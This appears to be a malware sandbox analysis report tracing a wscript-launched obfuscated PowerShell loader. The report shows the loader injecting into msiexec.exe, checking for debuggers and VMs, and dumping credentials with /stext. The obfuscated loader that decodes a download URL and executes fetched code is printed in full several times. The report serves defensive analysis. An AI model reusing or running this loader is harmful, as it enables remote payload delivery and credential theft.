Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0040AE51 FindFirstFileW,FindNextFileW, 12_2_0040AE51
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 13_2_00407EF8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 14_2_00407898
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00418981 memset,GetSystemInfo, 12_2_00418981
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: wscript.exe, 00000000.00000002.2141386198.00000223299BB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.2124542532.0000022327AFB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2140965686.0000022327B22000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139424436.0000022327B1F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWne
Source: wscript.exe, 00000000.00000003.2139783943.00000223299B3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: wscript.exe, 00000000.00000003.2139242350.0000022329A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123988097.0000022329A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2124657554.0000022329A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2141513610.0000022329A30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2291119459.000001DB62D30000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3406381912.0000000007B8A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3406381912.0000000007BE1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.2141824589.0000022329A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Windows\SysWOW64\msiexec.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_04D2D6CC LdrInitializeThunk,LdrInitializeThunk, 4_2_04D2D6CC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_23592639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_23592639
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 12_2_0040DD85
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 12_2_004044A4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_23594AB4 mov eax, dword ptr fs:[00000030h] 9_2_23594AB4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_2359724E GetProcessHeap, 9_2_2359724E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_23592B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_23592B1C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_23592639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_23592639
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_235960E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_235960E2

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Source: Yara match File source: amsi64_1908.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 1908, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 988, type: MEMORYSTR
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3E60000 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Offentlighedslovgivninger Raakremers Miljforstyrrelserne Daarligst Coniferous #>;$selsret='Valgets';<#Glattede Microscopal Jordvarmeanlggets Confirmatory Onerative Rheobase #>;$Dks=$Leuma+$host.UI;If ($Dks) {$syltetjskrukke++;}function Capulet43($Blimpishly){$Unvomitednefficiencies=$Berendo+$Blimpishly.'Length'-$syltetjskrukke; for( $Unvomited=3;$Unvomited -lt $Unvomitednefficiencies;$Unvomited+=4){$Mythol++;$Overpositiveness+=$Blimpishly[$Unvomited];$Fatalismens='Usurption';}$Overpositiveness;}function Donought($Folkeskolerne){ & ($afire) ($Folkeskolerne);}$Prestigiously100=Capulet43 'BloMCheo rz dei MulDerlsvia En/Ret ';$Prestigiously100+=Capulet43 'Ca 5Kae. Mo0sk I,d(D pWGa.isvune.edBodoOpdwConsCre Ph,N K.T ac b m1Nob0Fol. ,a0di ;Met RbdW ,ai,tin.or6 No4Bou;Tr, Tex .a6N t4 Un;Ret sp.rCouvF l:No,1In 3 Mi1Eld.Par0Al.)Tur GerGMyresrncAssk Bro De/B g2Tat0B r1Bro0 s 0P.r1Rev0Unm1.ro OrrFGl iBegr Que.rofOrio Opxmav/T,r1Kin3U e1 sk.Mic0Jos ';$Extrality=Capulet43 ' yguseksDefefi R Af-Am,AOpsgTrvetraNTret .n ';$Dolkhalerne=Capulet43 'Naph HatLvhtPropFu.:Bef/Ter/GyslsemnFem6BokbEl,9sub.Unes UnhVe oegap os/RalaQuimrecy.edkD.thsukRL ec BiMRet/ FlR ReeDigdsteoZn b relseliConn,ingPhi.Fo pPrissbed ,o ';$Unvomitednddelingens=Capulet43 'P.a> si ';$afire=Capulet43 'BilIEupEsp XE,t ';$Ceratitidae='goldsmithing';$Udskrivningsprogrammets='\Enspnderen.rep';Donought (Capulet43 'sun$GraG ,oLHenOTomB ekaA rL Uf: ,aMR,sEDiadEnsIBlgCC liBioN LnE,ar=Ple$P geWo,nYv vnav:s cAUdspHiePBesDMisAEuttsmaA T,+Eph$Fa URygdPies.ymK laR GliBayvLisnAzoI KoNskrg RisRdlpsalRRygoD sG E R .yA ChmlapMMule .rTMo s la ');Donought (Capulet43 'spi$UdmgCrilManO urBIm.a lmL Fo:Park WoOMe nInsssv oFolL siiEksdT aEFilr iqIMurnc.aGC,s=Eja$DegD Beos.plslaksarHOstaParLTile U RfirNspje Fu. issLizPUnplPeriK fTMul( y$ PoUArbN unvBuro,remsayiFletB,lEOs DB nn RedsotDGr.EsimLBeniOveNFi gProE NonNevsBge)Red ');Donought (Capulet43 'Cyk[L,nnHypERenT od. s sF.nECauRLynvDatIMa cMulescep jaoProI spnNontTemMHj AImpn.veACapgTacEEquR Re]De :,mp:Ra,sM seModc enUVinrD ciC ltAmpyGripGriRRoro HetHanO H C B ORe l.og En =r r pit[Inan isE NoTsk..AutsNatEFl c R U D RTraI.abT esYM.gP nrM no agT e OObdC ysoF iLBrst say,aspAdeeUbe]Gro:sem:Ka tsp Ls isPou1 La2 a ');$Dolkhalerne=$Konsolidering[0];$skovskadens177=(Capulet43 ' st$TilgP slHa Om sbI.da P LR v: aFMu.ONond BafLansN nT,ndEHypRkonNAftE elss a= HvnHocE OswFib-sa,oshiBsubj CrER dC eaTG r ErysCurY ,gsValtUndE t,mDoc.UnvN.paE FotK.n.IntW sye keB uc I L ri roeZenn ReTCou ');Donought ($skovskadens177);Donought (Capulet43 'Acc$MasfunpoOpbdUnsfOptsun t Aresk rHy n nueAfdsCa . H H.rseAfgaG odKnie InrbarsGry[In $P oEUn xD ttVierArtaUfolFriiVoctC uyPre] .t=Ena$ L,PTo,rE.beForsKu tApoiNongCo,iTetoshiuDa sIn.l.alysla1ste0 Ab0Raa ');$Taarnfalkes=Capulet43 'K e$KryfDhuoProdFrsf .asMeutvereFrorskrnUdbeVens rg.FraDT ao PowkacnUdblskrorepa skd saFMo i RelBl Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ncxgt" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ywcrugzm" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\izpjvzjnjwl" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#offentlighedslovgivninger raakremers miljforstyrrelserne daarligst coniferous #>;$selsret='valgets';<#glattede microscopal jordvarmeanlggets confirmatory onerative rheobase #>;$dks=$leuma+$host.ui;if ($dks) {$syltetjskrukke++;}function capulet43($blimpishly){$unvomitednefficiencies=$berendo+$blimpishly.'length'-$syltetjskrukke; for( $unvomited=3;$unvomited -lt $unvomitednefficiencies;$unvomited+=4){$mythol++;$overpositiveness+=$blimpishly[$unvomited];$fatalismens='usurption';}$overpositiveness;}function donought($folkeskolerne){ & ($afire) ($folkeskolerne);}$prestigiously100=capulet43 'blomcheo rz dei mulderlsvia en/ret ';$prestigiously100+=capulet43 'ca 5kae. mo0sk i,d(d pwga.isvune.edbodoopdwconscre ph,n k.t ac b m1nob0fol. ,a0di ;met rbdw ,ai,tin.or6 no4bou;tr, tex .a6n t4 un;ret sp.rcouvf l:no,1in 3 mi1eld.par0al.)tur gergmyresrncassk bro de/b g2tat0b r1bro0 s 0p.r1rev0unm1.ro orrfgl ibegr que.roforio opxmav/t,r1kin3u e1 sk.mic0jos ';$extrality=capulet43 ' yguseksdefefi r af-am,aopsgtrvetrantret .n ';$dolkhalerne=capulet43 'naph hatlvhtpropfu.:bef/ter/gyslsemnfem6bokbel,9sub.unes unhve oegap os/ralaquimrecy.edkd.thsukrl ec bimret/ flr reedigdsteozn b relseliconn,ingphi.fo pprissbed ,o ';$unvomitednddelingens=capulet43 'p.a> si ';$afire=capulet43 'bilieupesp xe,t ';$ceratitidae='goldsmithing';$udskrivningsprogrammets='\enspnderen.rep';donought (capulet43 'sun$grag ,olhenotomb ekaa rl uf: ,amr,sediadensiblgcc libion lne,ar=ple$p gewo,nyv vnav:s caudsphiepbesdmisaeuttsmaa t,+eph$fa urygdpies.ymk lar glibayvlisnazoi konskrg risrdlpsalrrygod sg e r .ya chmlapmmule .rtmo s la ');donought (capulet43 'spi$udmgcrilmano urbim.a lml fo:park woome ninsssv ofoll siieksdt aefilr iqimurnc.agc,s=eja$degd beos.plslaksarhostaparltile u rfirnspje fu. isslizpunplperik ftmul( y$ pouarbn unvburo,remsayifletb,leos db nn redsotdgr.esimlbeniovenfi gproe nonnevsbge)red ');donought (capulet43 'cyk[l,nnhyperent od. s sf.necaurlynvdatima cmulescep jaoproi spnnonttemmhj aimpn.veacapgtaceequr re]de :,mp:ra,sm semodc enuvinrd cic ltampygripgrirroro hethano h c b ore l.og en =r r pit[inan ise notsk..autsnatefl c r u d rtrai.abt esym.gp nrm no agt e oobdc ysof ilbrst say,aspadeeube]gro:sem:ka tsp ls ispou1 la2 a ');$dolkhalerne=$konsolidering[0];$skovskadens177=(capulet43 ' st$tilgp slha om sbi.da p lr v: afmu.onond baflansn nt,ndehyprkonnafte elss a= hvnhoce oswfib-sa,oshibsubj crer dc eatg r eryscury ,gsvaltunde t,mdoc.unvn.pae fotk.n.intw sye keb uc i l ri roezenn retcou ');donought ($skovskadens177);donought (capulet43 'acc$masfunpoopbdunsfoptsun t aresk rhy n nueafdsca . h h.rseafgag odknie inrbarsgry[in $p oeun xd ttvierartaufolfriivoctc uypre] .t=ena$ l,pto,re.beforsku tapoinongco,itetoshiuda sin.l.alysla1ste0 ab0raa ');$taarnfalkes=capulet43 'k e$kryfdhuoprodfrsf .asmeutverefrorskrnudbevens rg.fradt ao powkacnudblskrorepa skd safmo i relbl
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#offentlighedslovgivninger raakremers miljforstyrrelserne daarligst coniferous #>;$selsret='valgets';<#glattede microscopal jordvarmeanlggets confirmatory onerative rheobase #>;$dks=$leuma+$host.ui;if ($dks) {$syltetjskrukke++;}function capulet43($blimpishly){$unvomitednefficiencies=$berendo+$blimpishly.'length'-$syltetjskrukke; for( $unvomited=3;$unvomited -lt $unvomitednefficiencies;$unvomited+=4){$mythol++;$overpositiveness+=$blimpishly[$unvomited];$fatalismens='usurption';}$overpositiveness;}function donought($folkeskolerne){ & ($afire) ($folkeskolerne);}$prestigiously100=capulet43 'blomcheo rz dei mulderlsvia en/ret ';$prestigiously100+=capulet43 'ca 5kae. mo0sk i,d(d pwga.isvune.edbodoopdwconscre ph,n k.t ac b m1nob0fol. ,a0di ;met rbdw ,ai,tin.or6 no4bou;tr, tex .a6n t4 un;ret sp.rcouvf l:no,1in 3 mi1eld.par0al.)tur gergmyresrncassk bro de/b g2tat0b r1bro0 s 0p.r1rev0unm1.ro orrfgl ibegr que.roforio opxmav/t,r1kin3u e1 sk.mic0jos ';$extrality=capulet43 ' yguseksdefefi r af-am,aopsgtrvetrantret .n ';$dolkhalerne=capulet43 'naph hatlvhtpropfu.:bef/ter/gyslsemnfem6bokbel,9sub.unes unhve oegap os/ralaquimrecy.edkd.thsukrl ec bimret/ flr reedigdsteozn b relseliconn,ingphi.fo pprissbed ,o ';$unvomitednddelingens=capulet43 'p.a> si ';$afire=capulet43 'bilieupesp xe,t ';$ceratitidae='goldsmithing';$udskrivningsprogrammets='\enspnderen.rep';donought (capulet43 'sun$grag ,olhenotomb ekaa rl uf: ,amr,sediadensiblgcc libion lne,ar=ple$p gewo,nyv vnav:s caudsphiepbesdmisaeuttsmaa t,+eph$fa urygdpies.ymk lar glibayvlisnazoi konskrg risrdlpsalrrygod sg e r .ya chmlapmmule .rtmo s la ');donought (capulet43 'spi$udmgcrilmano urbim.a lml fo:park woome ninsssv ofoll siieksdt aefilr iqimurnc.agc,s=eja$degd beos.plslaksarhostaparltile u rfirnspje fu. isslizpunplperik ftmul( y$ pouarbn unvburo,remsayifletb,leos db nn redsotdgr.esimlbeniovenfi gproe nonnevsbge)red ');donought (capulet43 'cyk[l,nnhyperent od. s sf.necaurlynvdatima cmulescep jaoproi spnnonttemmhj aimpn.veacapgtaceequr re]de :,mp:ra,sm semodc enuvinrd cic ltampygripgrirroro hethano h c b ore l.og en =r r pit[inan ise notsk..autsnatefl c r u d rtrai.abt esym.gp nrm no agt e oobdc ysof ilbrst say,aspadeeube]gro:sem:ka tsp ls ispou1 la2 a ');$dolkhalerne=$konsolidering[0];$skovskadens177=(capulet43 ' st$tilgp slha om sbi.da p lr v: afmu.onond baflansn nt,ndehyprkonnafte elss a= hvnhoce oswfib-sa,oshibsubj crer dc eatg r eryscury ,gsvaltunde t,mdoc.unvn.pae fotk.n.intw sye keb uc i l ri roezenn retcou ');donought ($skovskadens177);donought (capulet43 'acc$masfunpoopbdunsfoptsun t aresk rhy n nueafdsca . h h.rseafgag odknie inrbarsgry[in $p oeun xd ttvierartaufolfriivoctc uypre] .t=ena$ l,pto,re.beforsku tapoinongco,itetoshiuda sin.l.alysla1ste0 ab0raa ');$taarnfalkes=capulet43 'k e$kryfdhuoprodfrsf .asmeutverefrorskrnudbevens rg.fradt ao powkacnudblskrorepa skd safmo i relbl
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#offentlighedslovgivninger raakremers miljforstyrrelserne daarligst coniferous #>;$selsret='valgets';<#glattede microscopal jordvarmeanlggets confirmatory onerative rheobase #>;$dks=$leuma+$host.ui;if ($dks) {$syltetjskrukke++;}function capulet43($blimpishly){$unvomitednefficiencies=$berendo+$blimpishly.'length'-$syltetjskrukke; for( $unvomited=3;$unvomited -lt $unvomitednefficiencies;$unvomited+=4){$mythol++;$overpositiveness+=$blimpishly[$unvomited];$fatalismens='usurption';}$overpositiveness;}function donought($folkeskolerne){ & ($afire) ($folkeskolerne);}$prestigiously100=capulet43 'blomcheo rz dei mulderlsvia en/ret ';$prestigiously100+=capulet43 'ca 5kae. mo0sk i,d(d pwga.isvune.edbodoopdwconscre ph,n k.t ac b m1nob0fol. ,a0di ;met rbdw ,ai,tin.or6 no4bou;tr, tex .a6n t4 un;ret sp.rcouvf l:no,1in 3 mi1eld.par0al.)tur gergmyresrncassk bro de/b g2tat0b r1bro0 s 0p.r1rev0unm1.ro orrfgl ibegr que.roforio opxmav/t,r1kin3u e1 sk.mic0jos ';$extrality=capulet43 ' yguseksdefefi r af-am,aopsgtrvetrantret .n ';$dolkhalerne=capulet43 'naph hatlvhtpropfu.:bef/ter/gyslsemnfem6bokbel,9sub.unes unhve oegap os/ralaquimrecy.edkd.thsukrl ec bimret/ flr reedigdsteozn b relseliconn,ingphi.fo pprissbed ,o ';$unvomitednddelingens=capulet43 'p.a> si ';$afire=capulet43 'bilieupesp xe,t ';$ceratitidae='goldsmithing';$udskrivningsprogrammets='\enspnderen.rep';donought (capulet43 'sun$grag ,olhenotomb ekaa rl uf: ,amr,sediadensiblgcc libion lne,ar=ple$p gewo,nyv vnav:s caudsphiepbesdmisaeuttsmaa t,+eph$fa urygdpies.ymk lar glibayvlisnazoi konskrg risrdlpsalrrygod sg e r .ya chmlapmmule .rtmo s la ');donought (capulet43 'spi$udmgcrilmano urbim.a lml fo:park woome ninsssv ofoll siieksdt aefilr iqimurnc.agc,s=eja$degd beos.plslaksarhostaparltile u rfirnspje fu. isslizpunplperik ftmul( y$ pouarbn unvburo,remsayifletb,leos db nn redsotdgr.esimlbeniovenfi gproe nonnevsbge)red ');donought (capulet43 'cyk[l,nnhyperent od. s sf.necaurlynvdatima cmulescep jaoproi spnnonttemmhj aimpn.veacapgtaceequr re]de :,mp:ra,sm semodc enuvinrd cic ltampygripgrirroro hethano h c b ore l.og en =r r pit[inan ise notsk..autsnatefl c r u d rtrai.abt esym.gp nrm no agt e oobdc ysof ilbrst say,aspadeeube]gro:sem:ka tsp ls ispou1 la2 a ');$dolkhalerne=$konsolidering[0];$skovskadens177=(capulet43 ' st$tilgp slha om sbi.da p lr v: afmu.onond baflansn nt,ndehyprkonnafte elss a= hvnhoce oswfib-sa,oshibsubj crer dc eatg r eryscury ,gsvaltunde t,mdoc.unvn.pae fotk.n.intw sye keb uc i l ri roezenn retcou ');donought ($skovskadens177);donought (capulet43 'acc$masfunpoopbdunsfoptsun t aresk rhy n nueafdsca . h h.rseafgag odknie inrbarsgry[in $p oeun xd ttvierartaufolfriivoctc uypre] .t=ena$ l,pto,re.beforsku tapoinongco,itetoshiuda sin.l.alysla1ste0 ab0raa ');$taarnfalkes=capulet43 'k e$kryfdhuoprodfrsf .asmeutverefrorskrnudbevens rg.fradt ao powkacnudblskrorepa skd safmo i relbl Jump to behavior
Source: msiexec.exe, 00000009.00000002.3406381912.0000000007B8A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3406381912.0000000007BE1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_23592933 cpuid 9_2_23592933
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_23592264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 9_2_23592264
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 13_2_004082CD
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0041739B GetVersionExW, 12_2_0041739B
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000009.00000002.3406381912.0000000007B8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3406381912.0000000007BE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
